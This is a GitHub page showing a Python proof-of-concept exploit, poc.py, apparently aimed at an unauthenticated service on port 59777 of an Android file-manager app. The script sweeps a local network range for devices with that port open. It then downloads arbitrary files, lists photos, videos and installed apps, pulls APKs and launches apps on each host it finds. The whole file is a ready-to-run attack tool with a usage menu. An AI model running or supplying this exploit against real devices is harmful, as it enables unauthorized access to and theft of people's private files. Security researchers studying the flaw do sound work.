-
Notifications
You must be signed in to change notification settings - Fork 131
/
poc.py
170 lines (140 loc) · 5.51 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
import json
import optparse
import requests
import sys
from socket import *
verbose = True
def sanitize_json(json):
json = json.replace("\'", "\"")
json = json.split('[')[1].split(']')[0]
json = json[0:len(json)-6] + "}"
return json
def get_file(addr, filepath):
if verbose:
print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777' + filepath
filename = filepath.rsplit('/', 1)[1]
resp = session.get(address, headers=headers, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if resp and resp.status_code == 200:
if verbose:
print('[*] Writing to file: ' + filename)
with open(filename, 'wb') as f:
f.write(resp.content)
def execute_cmd(addr, cmd, package):
if verbose:
print('[*] Executing command: ' + cmd + ' on ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777'
if package != '':
data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
else:
data = '{ "command":' + cmd + ' }'
resp = session.post(address, headers=headers, data=data, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if "NameNotFoundException" in resp.text:
print('[!] Package \'' + package + '\' not found!')
return
if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'):
text = sanitize_json(resp.text)
else:
text = resp.text
if resp and resp.status_code == 200:
if cmd == 'getAppThumbnail':
if verbose:
print('[*] Getting app thumbnail: ' + package)
with open(package + ".jpg", 'wb') as f:
f.write(resp.content)
elif cmd == 'appPull':
if verbose:
print('[*] Pulling app: ' + package)
with open(package + ".apk", 'wb') as f:
f.write(resp.content)
else:
print(text)
def is_up(addr):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(1)
if not s.connect_ex((addr, 59777)):
s.close()
return 1
else:
s.close()
def show_available_cmds():
print('')
print('######################')
print('# Available Commands #')
print('######################')
print('')
print('listFiles: List all the files')
print('listPics: List all the pictures')
print('listVideos: List all the videos')
print('listAudios: List all the audio files')
print('listApps: List all the apps installed')
print('listAppsSystem: List all the system apps')
print('listAppsPhone: List all the phone apps')
print('listAppsSdcard: List all the apk files in the sdcard')
print('listAppsAll: List all the apps installed (system apps included)')
print('getDeviceInfo: Get device info. Package name parameter is needed')
print('appPull: Pull an app from the device')
print('appLaunch: Launch an app. Package name parameter is needed')
print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
print('')
def set_up_menu():
parser = optparse.OptionParser()
parser.add_option('-g', '--get-file',
action="store", dest="filepath",
help="Get file path", default="")
parser.add_option('-c', '--cmd',
action="store", dest="cmd",
help="Command to execute", default="")
parser.add_option('-p', '--pkg',
action="store", dest="package",
help="Package name", default="")
parser.add_option('--ip', '--host',
action="store", dest="host",
help="Target host IP", default="")
parser.add_option('-n', '--network',
action="store", dest="network",
help="Network to scan", default="192.168.0.")
parser.add_option('-v', '--verbose',
action="store_true", dest="verb",
help="Loud stdout")
return parser.parse_args()
def main():
options, _ = set_up_menu()
verbose = options.verb
if len(sys.argv) > 1 and sys.argv[1] == 'list':
show_available_cmds()
elif options.filepath != '' or options.cmd != '':
def scan_host(addr):
if verbose:
print('[*] Checking address: ' + addr)
if is_up(addr):
if verbose:
print('[+] Address is up: ' + addr)
if options.filepath != '':
get_file(addr, options.filepath)
elif options.cmd != '':
execute_cmd(addr, options.cmd, options.package)
if options.host != '':
scan_host(options.host)
else:
for ip in range(0, 255):
scan_host(options.network + str(ip))
else:
print('Usage:')
print('- python3 poc.py list')
print('- python3 poc.py --get-file [filepath]')
print('- python3 poc.py --cmd [cmd]')
print('- python3 poc.py --cmd [cmd] --host [target_host]')
print('- python3 poc.py --cmd [cmd] --network [network]')
print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]')
if __name__ == '__main__':
main()